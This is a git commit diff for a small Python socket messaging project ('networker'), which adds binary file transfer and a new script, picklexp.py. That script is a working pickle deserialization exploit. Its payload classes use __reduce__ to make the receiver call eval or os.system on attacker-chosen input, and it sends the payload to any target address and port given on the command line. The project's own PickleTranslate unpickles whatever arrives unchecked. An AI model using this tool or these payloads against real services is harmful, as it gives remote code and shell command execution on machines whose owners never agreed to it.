Fix up networker for file sending.

main.py

@@ -2,7 +2,7 @@
 import networker as net
 import sys
 from threading import Thread
-import traceback
+#import traceback
 
 translators = (net.PickleTranslate(), net.JSONTranslate())
 
@@ -13,6 +13,13 @@ conn = None
 allowFiles = False
 log = []
 
+def listAsTypes(lin):
+    toret = "["
+    for x in lin:
+        toret += str(type(x)) + ", "
+    toret = toret[:-2]
+    return toret + "]"
+
 def onConn(addr):
     log.append(addr + " # Connection Established")
 
@@ -103,7 +110,7 @@ def main():
                     
         except Exception as e:
             print("Command Error!")
-            print(traceback.format_exc())
+            #print(traceback.format_exc())
     exit
                     
 
@@ -120,7 +127,7 @@ if __name__ == "__main__":
     if len(sys.argv) > 3:
         translator = translators[int(sys.argv[3]) - 1]
     else:
-        translator = translators[int(input("Enter the message translator position " + str(translators) + " : ")) - 1]
+        translator = translators[int(input("Enter the message translator position " + listAsTypes(translators) + " : ")) - 1]
     main()
     
         

networker.py

@@ -5,7 +5,7 @@ import socket
 import time
 from threading import Thread
 import base64
-import traceback
+#import traceback
 
 #Defines a message class that has a type, header and a body.
 class Message:
@@ -15,25 +15,30 @@ class Message:
         self.header = header
         if mtype == MTYPE_File:
             try:
-                f = open(header, "r")
+                f = open(header, "rb")
                 try:
-                    self.content = str(f.read())
+                    self.content = f.read()
                 except:
                     print("An issue writing the message for \"" + self.header + "\" occured.")
                     f.close()
             except:
                 print("An issue when opening a file for reading: \"" + self.header + "\" occured.")
+                #print(traceback.format_exc())
         else:
             self.content = content
 
     def saveContent(self):
         if self.mtype != MTYPE_File: pass
         try:
-            f = open(str(self.header), "w")
+            f = open(str(self.header), "wb")
             try:
-                f.write(bytes(self.content))
+                if type(self.content) == bytes or type(self.content) == bytearray:
+                    f.write(bytes(self.content))
+                else:
+                    f.write(bytes(self.content, encoding='utf-8'))
             except:
                 print("An issue writing the message for \"" + str(self.header) + "\" occured.")
+                #print(traceback.format_exc())
             f.close()
         except:
             print("An issue when opening a file for writing: \"" + str(self.header) + "\" occured.")
@@ -42,7 +47,7 @@ class Message:
         toReturn = {"mtype":self.mtype, "header":self.header, "ident__":"Message"}
         if type(self.content) == bytes or type(self.content) == bytearray:
             toReturn["contentb64"] = True
-            toReturn["content"] = base64.b64encode(bytes(self.content)).decode()
+            toReturn["content"] = base64.b64encode(bytes(self.content)).decode('utf-8')
         else:
             toReturn["contentb64"] = False
             toReturn["content"] = self.content
@@ -69,13 +74,13 @@ class PickleTranslate:
         try:
             return pickle.dumps(m)
         except:
-            print(traceback.format_exc())
+            #print(traceback.format_exc())
             return None
     def fromString(self, b):
         try:
             return pickle.loads(b)
         except:
-            print(traceback.format_exc())
+            #print(traceback.format_exc())
             return None
 
 #JSON Translator for Message to and from bytes.
@@ -84,13 +89,13 @@ class JSONTranslate:
         try:
             return json.dumps(m.toDict())
         except:
-            print(traceback.format_exc())
+            #print(traceback.format_exc())
             return None
     def fromString(self, b):
         try:
             return MessageFromDict(json.loads(b))
         except:
-            print(traceback.format_exc())
+            #print(traceback.format_exc())
             return None
 
 #Connection class
@@ -100,14 +105,19 @@ class Connection:
     threads = dict()
     actives = dict()
     def __init__(self, binder, translator, onconn, onrecv, onend):
-        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-        self.socket.bind(binder)
-        self.socket.listen(8)
+        if binder != None:
+            self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            self.socket.bind(binder)
+            self.socket.listen(8)
+        else:
+            self.socket = None
         self.translator = translator
         self.onconn = onconn
         self.onrecv = onrecv
         self.onend = onend
     def listener(self):
+        if self.socket == None:
+            return
         while self.active:
             s, a = self.socket.accept()
             ac = a[0] + ":" + str(a[1])
@@ -193,7 +203,7 @@ class Connection:
                     break
             time.sleep(0.0001)
         self.threads.clear()
-        self.socket.close()
+        if self.socket != None: self.socket.close()
 
     def addresses(self):
         if self.active:

picklexp.py

@@ -0,0 +1,97 @@
+#BSD 3-Clause, (C) Alfred Manville 2022
+#Be RESPONSIBLE when using this!
+import networker as net
+import pickle
+import sys
+#import traceback
+
+#Payloads:
+#State payloads only work if the Object is available at the target
+
+class ExpBase:
+    def __init__(self, data):
+        self.data = data
+
+class StateBase(ExpBase):
+    def __getstate__(self):
+        return self.data
+
+class StatePXP(StateBase):
+    def __setstate__(self, state):
+        self.data = state
+        print(self.data)
+
+class ReducePXP(ExpBase):
+    def __reduce__(self):
+        return print, (self.data,)
+
+class StateEXP(StateBase):
+    def __setstate__(self, state):
+        self.data = state
+        eval(self.data)
+
+class ReduceEXP(ExpBase):
+    def __reduce__(self):
+        return eval, (self.data,)
+
+class ReduceSXP(ExpBase):
+    def __reduce__(self):
+        import os
+        return os.system, (self.data,)
+
+def listAsTypes(lin):
+    toret = "["
+    for x in lin:
+        toret += str(type(x)) + ", "
+    toret = toret[:-2]
+    return toret + "]"
+
+payloads = (StatePXP(""), ReducePXP(""), StateEXP(""), ReduceEXP(""), ReduceSXP(""))
+payload = None
+taddr = ""
+tport = 0
+plid = 0
+pldata = ""
+
+def onx(a):
+    pass
+
+def ony(a, m):
+    pass
+
+def main():
+    conn = net.Connection(None, net.PickleTranslate(), onx, ony, onx)
+    print("Running Exploit @ " + taddr + ":" + str(tport))
+    print("Exploit: " + str(type(payload)) + " ; Data: " + pldata)
+    try:
+        conn.connect((taddr, tport))
+        print("Exploiting...")
+        conn.send(taddr+":"+str(tport), payload)
+        print("Exploited!")
+    except:
+        #print(traceback.format_exc())
+        pass
+    conn.close()
+    exit
+
+if __name__ == "__main__":
+    print("Python PicklExp (C) Alfred Manville 2022 BSD-3-Clause")
+    if len(sys.argv) > 1:
+        taddr = sys.argv[1]
+    else:
+        taddr = input("Enter the target address: ")
+    if len(sys.argv) > 2:
+        tport = int(sys.argv[2])
+    else:
+        tport = int(input("Enter the target port: "))
+    if len(sys.argv) > 3:
+        plid = int(sys.argv[3]) - 1
+    else:
+        plid = int(input("Enter the payload position " + listAsTypes(payloads) + " : ")) - 1
+    if len(sys.argv) > 4:
+        pldata = sys.argv[4]
+    else:
+        pldata = input("Enter the payload data: ")
+    payload = payloads[plid]
+    payload.data = pldata
+    main()